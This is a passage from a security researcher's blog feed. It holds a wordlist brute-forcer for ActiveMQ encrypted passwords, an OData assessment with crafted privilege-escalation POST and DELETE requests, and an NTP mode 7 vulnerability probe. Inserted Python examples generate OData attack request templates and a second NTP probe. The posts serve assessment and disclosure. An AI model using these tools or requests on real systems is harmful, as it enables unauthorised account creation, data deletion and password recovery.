<span style="font-family: Consolas;"> System.<i>exit</i>(0);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> String getEncryptedText() {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">static</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">void</span></b><span style="font-family: Consolas;">
main(String... args) </span><b><span style="color: #7f0055; font-family: Consolas;">throws</span></b><span style="font-family: Consolas;"> FileNotFoundException {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">if</span></b><span style="font-family: Consolas;">(args.</span><span style="color: #0000c0; font-family: Consolas;">length</span><span style="font-family: Consolas;"> != 2)</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> <i>showHelpAndExit</i>();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">for</span></b><span style="font-family: Consolas;">(String arg: args) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
</div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">            if(arg.equals("-h") || arg.equals("--h") || arg.equals("--help"))
                showHelpAndExit();
        }

        // args[0] is the encrypted value taken from the broker configuration,
        // args[1] is a file with one candidate decryption string per line
        AMQPasswordDecrypt brute = new AMQPasswordDecrypt(args[0]);

        Scanner in = new Scanner(new FileInputStream(args[1]));
        String decryptionString = "";
        String decryptedPassword = null;

        // Try every candidate until decrypt() returns something other than null
        while(in.hasNextLine()) {
            decryptionString = in.nextLine();
            System.out.printf("Trying to decrypt %s with %s\n", brute.getEncryptedText(), decryptionString);

            if((decryptedPassword = brute.decrypt(decryptionString)) != null)
                break;
        }

        if(decryptedPassword != null)
            System.out.printf("Encrypted password = %s, Decrypted password = %s, Decryption String = %s", brute.getEncryptedText(), decryptedPassword, decryptionString);
        else
            System.out.printf("%s could not be decrypted", brute.getEncryptedText());

        in.close();
    }
}
</code></pre>
</td>
</tr>
</tbody></table>
</td></tr>
</tbody></table>
</div>
</td></tr>
</tbody></table>
<div>
<span style="font-size: large; line-height: 17px;">Conclusion</span><br />
<span style="line-height: 17px;">To summarize, if you are using the ActiveMQ broker for business-critical processes, use the <span style="font-family: Courier New, Courier, monospace;">simpleAuthenticationPlugin</span> only for PoCs or initial testing, as it may not offer the level of security your environment needs. Consider implementing a custom JAAS (Java Authentication and Authorization Service) authentication plugin instead.</span><br />
<span style="line-height: 17px;"><span style="text-align: center;"><br /></span></span>
<span style="line-height: 17px;">We will also have a blog post on writing a </span><a href="http://en.wikipedia.org/wiki/Java_Authentication_and_Authorization_Service" style="line-height: 17px;" target="_blank">JAAS</a><span style="line-height: 17px;">-based authentication plugin for ActiveMQ in the near future. Stay tuned!</span></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-7087378659541040742013-02-27T06:50:00.001-08:002013-02-27T06:50:32.502-08:00Evaluating OData Applications<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I recently evaluated a SaaS provider's <a href="http://www.odata.org/" target="_blank">OData</a> application, looking at how its endpoint client application communicated over OData with its backend servers. The client application allowed SaaS consumers to schedule critical computation functions, download the results, and perform additional actions using OData’s RESTful operations.<br />
<br />
This blog post aims to provide an overview of the OData assessment methodology and also discusses a few interesting findings identified in the specific OData implementation tested.<br />
<br />
<br />
<b><span style="font-size: large;">Understanding Our Target</span></b><br />
The first step of any assessment is to gain an understanding of how the application functions. With OData applications in particular, you’ll want to explore all available functionality, monitor the client's communication with a proxy such as Fiddler, and then map out the RESTful operations and the URIs accessed for each piece of functionality. Once this is done, you should have an understanding of the application as well as of its OData requests and responses. The specific application we were targeting had only one user role, so unless the Service Metadata Document review revealed additional functionality or features, we could test only for horizontal privilege escalation.<br />
<br />
From the RESTful operations you should be able to determine the Service Root URI and the Service Metadata Document URI. For the application we were targeting, we used these two URIs to perform the following:<br />
<br />
<br />
<ol style="text-align: left;">
<li>We accessed the Service Root URI, and it listed several Feeds that were never referenced by the thick client. A win? Not until we are able to actually access real data through them.</li>
<li>Next we used Oyedata to perform automated analysis of the OData service (from its Service Metadata Document) and exported the fuzzing templates to a text file for use with Burp Suite. The target OData service did not support the JSON format, so Oyedata’s ability to generate fuzzing templates in both JSON and XML formats was a lifesaver.</li>
<li>We also downloaded the Service Metadata Document locally for manual analysis.</li>
</ol>
As a result of these steps we discovered several additional Feeds and pieces of functionality that the thick client did not use. Interesting, huh? Let’s move on to the assessment phase.<br />
<br />
<br />
<span style="font-size: large;">Oyedata</span><br />
<a href="http://www.mcafee.com/us/downloads/free-tools/oyedata.aspx" target="_blank">OyeData</a> is a tool I wrote to help with OData assessments, and it is pretty much required for this kind of work. If you're unfamiliar with the tool, check out the video:<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/QmgmfHXWgvo" width="420"></iframe><br /><br />
</center>
<br />
<span style="font-size: large;">Assessment</span><br />
Now that you fully understand the application and have a good idea of what is available on the server side, you can begin to think about the available attack vectors. Given what was available in our application, we proceeded to the attack phase with the following:<br />
<br />
<br />
<ol style="text-align: left;">
<li>Check for horizontal privilege escalation.</li>
<li>Identify what data and functionality were available through the additional Feeds discovered.</li>
<li>Attempt the RESTful operations that the thick client did not use but that the automated Oyedata analysis showed to exist. Oyedata’s data generator also helped by generating random sample data, especially for cryptic data types like Edm.DateTime and Edm.DateTimeOffset.</li>
</ol>
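The enumeration and request-generation steps above, as an added Python example (it is not Oyedata's code, nor anything from the assessed service): it parses an OData v2 Service Metadata Document, lists every entity set with its key and properties, builds Atom entry bodies with type-appropriate sample values, and emits GET/POST/PUT/DELETE templates per entity set, flagging the sets the thick client never touched. The embedded $metadata is constructed for the example; the RemoteLogins and Submissions set names and the RemoteLogin properties are taken from the requests shown in the findings below, while the Id keys, the Submission properties, the host and the service root path are assumptions.<br />

```python
"""Added example, not Oyedata's code: enumerate an OData v2 service from its
$metadata document and emit the raw requests worth replaying per entity set."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EDM_NS = "http://schemas.microsoft.com/ado/2008/09/edm"
ATOM_NS = "http://www.w3.org/2005/Atom"
M_NS = "http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"
D_NS = "http://schemas.microsoft.com/ado/2007/08/dataservices"

# Placeholder values per EDM type for Atom entry bodies (Edm.DateTime uses the
# ISO 8601 form that goes inside an entry, not the datetime'...' URI literal).
SAMPLE_VALUES = {
    "Edm.Int32": "1", "Edm.Int64": "1", "Edm.Boolean": "true", "Edm.Decimal": "1.0",
    "Edm.String": "test", "Edm.DateTime": "2013-02-27T06:50:00",
    "Edm.DateTimeOffset": "2013-02-27T06:50:00Z",
}

# Constructed $metadata modelled on the service in the post: the entity set
# names and the RemoteLogin properties come from the requests shown in the
# findings; the Id keys and the Submission properties are assumptions.
SAMPLE_METADATA = """<?xml version="1.0" encoding="utf-8"?>
<edmx:Edmx Version="1.0" xmlns:edmx="http://schemas.microsoft.com/ado/2007/06/edmx">
 <edmx:DataServices xmlns:m="%s" m:DataServiceVersion="2.0">
  <Schema Namespace="XXXXModel" xmlns="%s">
   <EntityType Name="RemoteLogin">
    <Key><PropertyRef Name="Id"/></Key>
    <Property Name="Id" Type="Edm.Int32" Nullable="false"/>
    <Property Name="GroupId" Type="Edm.Int32" Nullable="false"/>
    <Property Name="RemoteServerId" Type="Edm.Int32" Nullable="false"/>
    <Property Name="Login" Type="Edm.String" Nullable="false"/>
    <Property Name="Password" Type="Edm.String" Nullable="false"/>
   </EntityType>
   <EntityType Name="Submission">
    <Key><PropertyRef Name="Id"/></Key>
    <Property Name="Id" Type="Edm.Int32" Nullable="false"/>
    <Property Name="SubmittedOn" Type="Edm.DateTime"/>
   </EntityType>
   <EntityContainer Name="XXXXService" m:IsDefaultEntityContainer="true">
    <EntitySet Name="RemoteLogins" EntityType="XXXXModel.RemoteLogin"/>
    <EntitySet Name="Submissions" EntityType="XXXXModel.Submission"/>
   </EntityContainer>
  </Schema>
 </edmx:DataServices>
</edmx:Edmx>""" % (M_NS, EDM_NS)

def _xml(text):
    return ET.fromstring(text.encode("utf-8") if isinstance(text, str) else text)

def parse_metadata(edmx_xml):
    """Map each entity set to its type, key property names and (name, type, nullable) properties."""
    root, types = _xml(edmx_xml), {}
    for schema in root.iter("{%s}Schema" % EDM_NS):
        for et in schema.findall("{%s}EntityType" % EDM_NS):
            types["%s.%s" % (schema.get("Namespace"), et.get("Name"))] = {
                "keys": [ref.get("Name") for ref in et.iter("{%s}PropertyRef" % EDM_NS)],
                "properties": [(p.get("Name"), p.get("Type"), p.get("Nullable", "true") == "true")
                               for p in et.findall("{%s}Property" % EDM_NS)]}
    return {es.get("Name"): dict(type=es.get("EntityType"), **types[es.get("EntityType")])
            for es in root.iter("{%s}EntitySet" % EDM_NS)}

def key_literal(entity):
    """Key predicate for one entity: 1 for an integer key, 'test' for a string key, Name=value pairs when composite."""
    by_name = dict((name, typ) for name, typ, _ in entity["properties"])
    parts = []
    for key in entity["keys"]:
        value = SAMPLE_VALUES.get(by_name[key], "1")
        literal = "'%s'" % value if by_name[key] == "Edm.String" else value
        parts.append(literal if len(entity["keys"]) == 1 else "%s=%s" % (key, literal))
    return ",".join(parts)

def atom_entry(entity, overrides=None):
    """Atom entry body for a POST or PUT, one d: element per declared property."""
    overrides = overrides or {}
    lines = ['<?xml version="1.0" encoding="utf-8"?>',
             '<entry xmlns="%s" xmlns:m="%s" xmlns:d="%s">' % (ATOM_NS, M_NS, D_NS),
             '  <content type="application/xml">', '    <m:properties>']
    for name, typ, _nullable in entity["properties"]:
        value = escape(str(overrides.get(name, SAMPLE_VALUES.get(typ, "1"))))
        type_attr = "" if typ == "Edm.String" else ' m:type="%s"' % typ
        lines.append("      <d:%s%s>%s</d:%s>" % (name, type_attr, value, name))
    return "\n".join(lines + ["    </m:properties>", "  </content>", "</entry>"])

def entry_properties(atom_xml):
    """Read the d: properties back out of one entry, e.g. a row of a leaked Users feed."""
    props = _xml(atom_xml).find(".//{%s}properties" % M_NS)
    return dict((el.tag.split("}", 1)[1], el.text) for el in props)

def request_templates(service_root, sets, used_by_client=(), host="www.vulnerablehost.com:8011"):
    """GET/POST on each collection and PUT/DELETE on one entity of it; sets the thick
    client never used are flagged, since their access control was never exercised."""
    headers = ("Host: %s\nAccept: application/atom+xml,application/atomsvc+xml,application/xml\n"
               "Content-Type: application/atom+xml" % host)
    templates = []
    for name, entity in sorted(sets.items()):
        collection = "%s/%s" % (service_root, name)
        single = "%s(%s)" % (collection, key_literal(entity))
        body = atom_entry(entity)
        for method, path, payload in (("GET", collection, ""), ("POST", collection, body),
                                      ("PUT", single, body), ("DELETE", single, "")):
            templates.append({"entity_set": name, "method": method, "path": path,
                              "unused_by_client": name not in used_by_client,
                              "request": "%s %s HTTP/1.1\n%s\n\n%s" % (method, path, headers, payload)})
    return templates

if __name__ == "__main__":
    for t in request_templates("/XXXXService.svc", parse_metadata(SAMPLE_METADATA), used_by_client={"Submissions"}):
        print("%-6s %s%s" % (t["method"], t["path"], "  never used by the client" if t["unused_by_client"] else ""))
```

Point parse_metadata() at the real document fetched from the service root's $metadata URI and the templates go straight into Burp Repeater; entry_properties() reads the d: properties back out of each entry a feed returns, which is how a leaked Users feed gets tabulated.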
<br />
<div>
<div>
<span style="font-size: large;">A Few Interesting Findings</span></div>
<div>
After exhausting our attack vectors (plus a few extra from our methodology) we ended up with some interesting findings. Here are some of them. We have modified and obfuscated the output a bit, as we are still awaiting remediation confirmation from the vendor. </div>
<div>
<br /></div>
<div>
<b>Passwords Stored in the Clear and Exposed via a Feed</b></div>
<div>
The OData web service exposed the usernames and passwords of all users via its Users feed. This finding highlights two separate problems:</div>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>The affected feed had misconfigured access control that allowed access to the Users table.</li>
<li>The database stored user passwords in the clear.</li>
</ol>
<div>
<br /></div>
</div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4DDEn3ueWtz1df9882OsO1VrmgUEWeZ_82pXSGq0lI3lU4f4_noEI2L2o4wep8K-VegxPgrCLTCetLn2IEFd7jtNu2Q7fLKztsO13UXKJdmGklIoqGHSP8oHJATLK4Ni4od2VgCZNGcw/s1600/1.png" imageanchor="1"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4DDEn3ueWtz1df9882OsO1VrmgUEWeZ_82pXSGq0lI3lU4f4_noEI2L2o4wep8K-VegxPgrCLTCetLn2IEFd7jtNu2Q7fLKztsO13UXKJdmGklIoqGHSP8oHJATLK4Ni4od2VgCZNGcw/s400/1.png" width="400" /></a><br />
<br />
<h2>
Privilege Escalation</h2>
The thick client did not offer any functionality to add, update or remove users, and neither did the user role we had. However, it was possible to add new logins with the privileges of our user account by sending the following POST request (generated using Oyedata) to the OData service. It was also possible to update or delete other users with the test user account we had.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> POST /XXXXXService.svc/RemoteLogins HTTP/1.1
Host: www.vulnerablehost.com:8011
Accept: application/atom+xml,application/atomsvc+xml,application/xml
Content-Type: application/atom+xml
Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop

<?xml version="1.0" encoding="utf-8"?>
<entry xmlns="http://www.w3.org/2005/Atom" xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata" xmlns:d="http://schemas.microsoft.com/ado/2007/08/dataservices">
<content type="application/xml">
<m:properties>
<d:GroupId>4</d:GroupId>
<d:RemoteServerId>1</d:RemoteServerId>
<d:Login>newuser</d:Login>
<d:Password>newpassword </d:Password>
</m:properties>
</content>
</entry>
</code></pre>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV9yRnbr3Frby7ijCIbKOjlikXFXrzV_bhN5IK-smWSUUvCWoHMQFjZZV1BPBEJtT5MeVZMZjSRrbrBtAv3fCFZJhFq09j6yLoIJxp9NrVq6hGJBbzqNRtmWbS1cacfWYIiUYMoJloN5k/s1600/2.png" imageanchor="1"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV9yRnbr3Frby7ijCIbKOjlikXFXrzV_bhN5IK-smWSUUvCWoHMQFjZZV1BPBEJtT5MeVZMZjSRrbrBtAv3fCFZJhFq09j6yLoIJxp9NrVq6hGJBbzqNRtmWbS1cacfWYIiUYMoJloN5k/s400/2.png" width="400" /></a><br />
<br />
The application also allowed us to download the results of other users’ submissions and was found to be vulnerable to several instances of both horizontal and vertical privilege escalation.<br />
<br />
<h2>
Application Logic Bypass</h2>
The client application did not provide any functionality to overwrite or delete past computation submissions. We were able to do both anyway by abusing the OData web service, which was insecurely configured and allowed updates via the PUT method. Previous submissions could also be deleted by issuing the following request, where the value ‘100’ is the submission ID.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> DELETE /XXXXService.svc/Submissions(100) HTTP/1.1
Host: www.vulnerablehost.com:8011
Accept: application/atom+xml,application/atomsvc+xml,application/xml
Content-Type: application/atom+xml
Authorization: Basic UmVhbGx5PzpOb3RoaW5nSGVyZTop
</code></pre>
<br />
<br />
<h1>
Conclusion</h1>
OData is a new protocol that attempts to be the JDBC/ODBC of the internet and adds a new dimension to data access. Organizations that plan to implement OData should strive to learn more about this wonderful new protocol and the security risks involved, and secure it as part of the deployment process.<br />
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-86978057124721691022012-10-06T21:40:00.000-07:002012-10-06T21:41:47.281-07:00Verifying NTP Reserved Mode Denial of Service Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I recently needed to check for the NTP Reserved Mode Denial of Service vulnerability <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3563">CVE-2009-3563</a> without causing the DoS condition on the production server. Using Metasploit’s DoS module <span style="font-family: Courier New, Courier, monospace;">auxiliary/dos/ntp/ntpd_reserved_dos</span> was therefore not an option, so I wrote my own Ruby script to assess the remote server. The script sends a single mode 7 packet and checks the content of the UDP reply to determine whether the vulnerability is present. It is shared below.<br />
<span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style><br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#Author: Gursev Singh Kalra
# Sends one NTP mode 7 (MODE_PRIVATE) packet that already has the response bit set.
# A vulnerable ntpd answers it with a mode 7 error response; a patched one stays silent.
require 'socket'
TIMEOUT = 5
if(ARGV.count != 1)
  puts "[-] Target host not provided. Usage: ntp.rb &lt;target_server&gt;"
  exit 1
end
target_server = ARGV[0]
target_port = 123
socket = nil
response = nil
begin
  # 0x97 = response bit set, version 2, mode 7; the rest is the remainder of the mode 7 header.
  # .b keeps the probe as raw bytes rather than an invalid UTF-8 string.
  test_string = "\x97\x00\x00\x00\xAA\x00\x00\x00".b
  socket = UDPSocket.open
  socket.send(test_string, 0, target_server, target_port)
  # wait up to TIMEOUT seconds for a reply; a patched server sends none
  if select([socket], nil, nil, TIMEOUT)
    response = socket.recvfrom(10)
  end
rescue SocketError, SystemCallError, IOError =&gt; ex
  puts ex.to_s
ensure
  socket.close if(socket)
end
# a vulnerable server replies with a mode 7 response header (0x97) followed by
# zero auth/sequence, implementation and request code bytes
if(response &amp;&amp; response[0].b.index("\x97\x00\x00\x00".b))
  puts "[+] Vulnerable to NTP Mode 7 Request Denial Of Service"
else
  puts "[-] Not vulnerable to NTP Mode 7 Request Denial Of Service"
end
</code></pre>
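An added Python companion to the script above (not part of the original post): it decodes the 8-byte mode 7 header so that the verdict rests on parsed fields rather than a raw byte match, and keeps the same single-packet probe for use from the command line. The reply bytes used for the self-check are constructed from the way ntpd behaves: an unpatched ntpd lets a mode 7 packet that already carries the response bit through its format checks and acknowledges it with a mode 7 error response carrying INFO_ERR_FMT (error code 3), which is the packet two servers bounce between each other in the CVE; a patched ntpd drops such packets without replying. The error-code names are those in ntp_request.h; the probe() function is the only live network call and is not exercised by the self-check.<br />

```python
"""Added example, not the script from the post: decode the NTP mode 7
(MODE_PRIVATE) header so the verdict rests on parsed fields, with the same
single-packet probe available from the command line."""
import socket
import struct

NTP_PORT = 123
MODE_PRIVATE = 7
RESP_BIT = 0x80
MORE_BIT = 0x40
# Error codes carried in the high nibble of err_nitems (names from ntp_request.h).
ERROR_NAMES = {0: "INFO_OKAY", 1: "INFO_ERR_IMPL", 2: "INFO_ERR_REQ", 3: "INFO_ERR_FMT",
               4: "INFO_ERR_NODATA", 7: "INFO_ERR_AUTH"}
# Same 8 bytes the Ruby script sends: response bit set, version 2, mode 7,
# implementation 0, request code 0, then a non-zero err_nitems word.
PROBE = b"\x97\x00\x00\x00\xAA\x00\x00\x00"

def parse_mode7_header(packet):
    """Split the 8-byte mode 7 header into its fields."""
    if len(packet) < 8:
        raise ValueError("mode 7 header needs 8 bytes, got %d" % len(packet))
    rm_vn_mode, auth_seq, impl, request, err_nitems, mbz_size = struct.unpack("!BBBBHH", packet[:8])
    return {"response": bool(rm_vn_mode & RESP_BIT), "more": bool(rm_vn_mode & MORE_BIT),
            "version": (rm_vn_mode >> 3) & 0x7, "mode": rm_vn_mode & 0x7,
            "auth": bool(auth_seq & 0x80), "sequence": auth_seq & 0x7F,
            "implementation": impl, "request_code": request,
            "error": err_nitems >> 12, "items": err_nitems & 0x0FFF,
            "item_size": mbz_size & 0x0FFF}

def is_vulnerable_reply(reply):
    """True when the server answered our mode 7 *response* with a mode 7 response of
    its own. A patched ntpd drops incoming responses; an unpatched one acknowledges
    them with an INFO_ERR_FMT error response, which is the packet two servers can
    bounce between each other indefinitely (CVE-2009-3563)."""
    try:
        hdr = parse_mode7_header(reply)
    except ValueError:
        return False
    return hdr["mode"] == MODE_PRIVATE and hdr["response"]

def describe(reply):
    """One-line summary of a reply for the operator."""
    try:
        hdr = parse_mode7_header(reply)
    except ValueError:
        return "short reply (%d bytes)" % len(reply)
    return "mode %d, response=%s, version=%d, error=%s" % (
        hdr["mode"], hdr["response"], hdr["version"], ERROR_NAMES.get(hdr["error"], hdr["error"]))

def probe(host, port=NTP_PORT, timeout=5.0):
    """Send PROBE once and return the raw reply, or None on timeout. This is the live
    network call and is only invoked from the command line below."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(PROBE, (host, port))
        try:
            data, _ = sock.recvfrom(512)
        except socket.timeout:
            return None
    return data

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        sys.exit("usage: ntp_mode7_check.py TARGET_SERVER")
    reply = probe(sys.argv[1])
    if reply is None:
        print("[-] No reply: not vulnerable to the NTP mode 7 response loop (or port 123 is filtered)")
    elif is_vulnerable_reply(reply):
        print("[+] Vulnerable: server answered a mode 7 response (%s)" % describe(reply))
    else:
        print("[-] Replied, but not with a mode 7 response (%s)" % describe(reply))
```

Because the probe is a single unspoofed packet that elicits at most one reply, it is safe against a production server; the DoS itself needs two servers (or a spoofed source) trading error responses, which is exactly what the Metasploit module sets up and this check avoids.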
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicraLVC_jq8xEnnGJ1GWEJ5CqDLEtmz3rxCAzaITdD9RwnOVHsXrYIdAywLk1EC7hupvHaWYuIek7w-nPpo2NgmjXUpkoLu3pJrn9qj2QQRwMX7ApfhEP1LVfJGZ7a50Whsb4ud3e99i4m/s1600/to-remote-server.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicraLVC_jq8xEnnGJ1GWEJ5CqDLEtmz3rxCAzaITdD9RwnOVHsXrYIdAywLk1EC7hupvHaWYuIek7w-nPpo2NgmjXUpkoLu3pJrn9qj2QQRwMX7ApfhEP1LVfJGZ7a50Whsb4ud3e99i4m/s400/to-remote-server.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Image shows request capture in wireshark</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR35u9vewKMm30Z4eCKxxBrhGlvknysA85J3eiOie1RdV7fyazXF38ohuLSdCqlTjMVuX1tjjAtwv-TE214LbLGoJD_EtKveH7LvHgfTZJLJzbus_v1hWn0kpvX6TBHbi8dcBVhF79rcov/s1600/from-remote-server.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR35u9vewKMm30Z4eCKxxBrhGlvknysA85J3eiOie1RdV7fyazXF38ohuLSdCqlTjMVuX1tjjAtwv-TE214LbLGoJD_EtKveH7LvHgfTZJLJzbus_v1hWn0kpvX6TBHbi8dcBVhF79rcov/s400/from-remote-server.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Image shows response capture in wireshark</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbJelBL55PvYEHva31FjQXU3p2Yxfma72PUXYjJIYUBmieaIxQKWVCl-r7ZQd44tg83EDYeEteSIR99rkXTJ42ghEBKAw-o5OI5ddEqcZSUwmQYPi7B8Wa6pF0twt-JTSHGgQdnpb3iVW/s1600/ntp-run.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpbJelBL55PvYEHva31FjQXU3p2Yxfma72PUXYjJIYUBmieaIxQKWVCl-r7ZQd44tg83EDYeEteSIR99rkXTJ42ghEBKAw-o5OI5ddEqcZSUwmQYPi7B8Wa6pF0twt-JTSHGgQdnpb3iVW/s400/ntp-run.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: Image shows script in action</td></tr>
</tbody></table>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-73507022011364674572012-10-02T21:36:00.001-07:002012-10-06T21:44:26.164-07:00Bypassing CAPTCHAs by Impersonating CAPTCHA Providers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">CAPTCHA service providers validate millions of CAPTCHAs each day and protect thousands of websites against the bots. A secure CAPTCHA generation and validation ecosystem forms the basis of the mutual trust model between the CAPTCHA provider and the consumer. A variety of damage can occur if any component of this ecosystem is compromised.</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">Analysis of the CAPTCHA integration libraries provided by several CAPTCHA providers (including <a href="http://www.google.com/recaptcha" target="_blank">reCAPTCHA</a>) revealed that almost all of the CAPTCHA verification APIs relied on the plain text HTTP protocol to perform CAPTCHA validation. Because of this, the CAPTCHA provider’s identity was not validated, no message authentication checks were performed, and the entire CAPTCHA validation took place over an unencrypted channel. This vulnerability was reported to the reCAPTCHA team several months ago. </span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">If you decompile the .NET plugin, you can pull out reCAPTCHA's verification URL, which shows the absence of HTTPS:</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
